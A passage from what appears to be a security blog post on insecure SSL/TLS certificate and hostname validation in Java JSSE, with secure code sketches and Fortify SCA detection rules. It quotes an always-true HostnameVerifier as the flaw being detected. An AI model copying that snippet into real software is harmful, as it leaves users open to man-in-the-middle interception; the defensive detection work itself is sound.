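The safer alternative mentioned above is to import the self-signed certificate into a trust store rather than gutting the TrustManager. A minimal sketch of that approach (the method name is ours; pass it a stream over the certificate file, e.g. server.crt):

```java
import java.io.InputStream;
import java.security.KeyStore;
import java.security.cert.CertificateFactory;
import java.security.cert.X509Certificate;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManagerFactory;

public class PinnedTrust {
    // Builds an SSLContext that trusts exactly the supplied CA certificate,
    // leaving chain-of-trust verification fully enabled.
    static SSLContext contextTrusting(InputStream caCert) throws Exception {
        CertificateFactory cf = CertificateFactory.getInstance("X.509");
        X509Certificate ca = (X509Certificate) cf.generateCertificate(caCert);
        KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
        ks.load(null, null);              // start from an empty keystore
        ks.setCertificateEntry("ca", ca); // trust exactly this certificate
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(
                TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(ks);
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, tmf.getTrustManagers(), null);
        return ctx;
    }
}
```

The returned context's getSocketFactory() can then back subsequent HTTPS connections, keeping validation intact in both development and production.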

Allowing All Hostnames

The application does not check whether the digital certificate that the server sends is issued to the URL the client is connecting to.

The Java Secure Socket Extension (JSSE) provides two sets of APIs to establish secure communications, a high-level HttpsURLConnection API and a low-level SSLSocket API.

The HttpsURLConnection API performs hostname verification by default; again, this can be disabled by overriding the verify() method of a custom HostnameVerifier (there are around 12,800 results when searching for the below code on GitHub).

HostnameVerifier allHostsValid = new HostnameVerifier() {
    public boolean verify(String hostname, SSLSession session) {
        return true;
    }
};

The SSLSocket API does not perform hostname verification out of the box. The code below is a Java 8 JDK snippet: hostname verification is performed only if the endpoint identification algorithm is different from an empty String or a NULL value.

private void checkTrusted(X509Certificate[] chain, String authType,
        SSLEngine engine, boolean isClient) throws CertificateException {
    ...
    String identityAlg = engine.getSSLParameters()
            .getEndpointIdentificationAlgorithm();
    if (identityAlg != null && identityAlg.length() != 0) {
        checkIdentity(session, chain[0], identityAlg, isClient,
                getRequestedServerNames(engine));
    }
    ...
}

When SSL/TLS clients use the raw SSLSocketFactory instead of the HttpsURLConnection wrapper, the identification algorithm is set to NULL and hostname verification is silently skipped. As a result, if an attacker holds a MITM position on the network, a client connecting to ‘domain.com’ will also accept a valid server certificate issued for ‘some-evil-domain.com’.

This documented behavior is buried in the JSSE Reference Guide:

“When using raw SSLSocket and SSLEngine classes, you should always check the peer’s credentials before sending any data. The SSLSocket and SSLEngine classes do not automatically verify that the host name in a URL matches the host name in the peer’s credentials. An application could be exploited with URL spoofing if the host name is not verified.”
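When the raw SSLSocket API must be used, hostname verification can be switched on explicitly through SSLParameters before the handshake (Java 7+). A minimal sketch; the helper name is ours:

```java
import javax.net.ssl.SSLParameters;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

public class SocketHardening {
    // Opts in to RFC 2818 ("HTTPS") hostname checking on a raw SSLSocket.
    // Unlike HttpsURLConnection, the socket API does NOT do this for you.
    static void enableHostnameVerification(SSLSocket socket) {
        SSLParameters params = socket.getSSLParameters();
        params.setEndpointIdentificationAlgorithm("HTTPS");
        socket.setSSLParameters(params);
        // startHandshake() will now fail if the server certificate
        // does not match the host the socket was created for.
    }
}
```

Setting the endpoint identification algorithm makes the JDK code shown earlier take the checkIdentity() branch, so the verification is no longer silently skipped.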

Our contribution: Fortify SCA Rules

To detect the above insecure usage we have coded the following checks in 12 custom rules for HP Fortify SCA. These rules identify issues in code relying on both JSSE and Apache HTTPClient since they are widely used libraries for thick clients and Android apps.

  • Over-Permissive Hostname Verifier: the rule is fired when the code declares a HostnameVerifier, and it always returns ‘true’.

<Predicate>
  <![CDATA[
Function f: f.name is "verify" and f.enclosingClass.supers 
contains [Class: name=="javax.net.ssl.HostnameVerifier" ] and 
f.parameters[0].type.name is "java.lang.String" and 
f.parameters[1].type.name is "javax.net.ssl.SSLSession" and 
f.returnType.name is "boolean" and f contains 
[ReturnStatement r: r.expression.constantValue matches "true"] 
  ]]>
</Predicate>
  • Over-Permissive Trust Manager: the rule is fired when the code declares a TrustManager that never throws a CertificateException. Throwing the exception is how the API signals unexpected conditions.

<Predicate>
  <![CDATA[
Function f: f.name is "checkServerTrusted" and 
f.parameters[0].type.name is "java.security.cert.X509Certificate" 
and f.parameters[1].type.name is "java.lang.String" and 
f.returnType.name is "void" and not f contains [ThrowStatement t: 
t.expression.type.definition.supers contains [Class: name == 
"(javax.security.cert.CertificateException|java.security.cert.CertificateException)"]] 
  ]]>
</Predicate>
  • Missing Hostname Verification: the rule is fired when the code is using the Low-Level SSLSocket API and does not set a HostnameVerifier.

  • Often Misused: Custom HostnameVerifier: the rule is fired when the code is using the High-Level HttpsURLConnection API and it sets a Custom HostnameVerifier.

  • Often Misused: Custom SSLSocketFactory: the rule is fired when the code is using the High-Level HttpsURLConnection API and it sets a Custom SSLSocketFactory.

We decided to fire the “often misused” rules because, even though the application is using the high-level API, any overriding of these methods should be manually reviewed.

The rules pack is available on Github. These checks should always be performed during Source Code Analysis to ensure the code is not introducing an insecure SSL/TLS usage.

https://github.com/GDSSecurity/JSSE_Fortify_SCA_Rules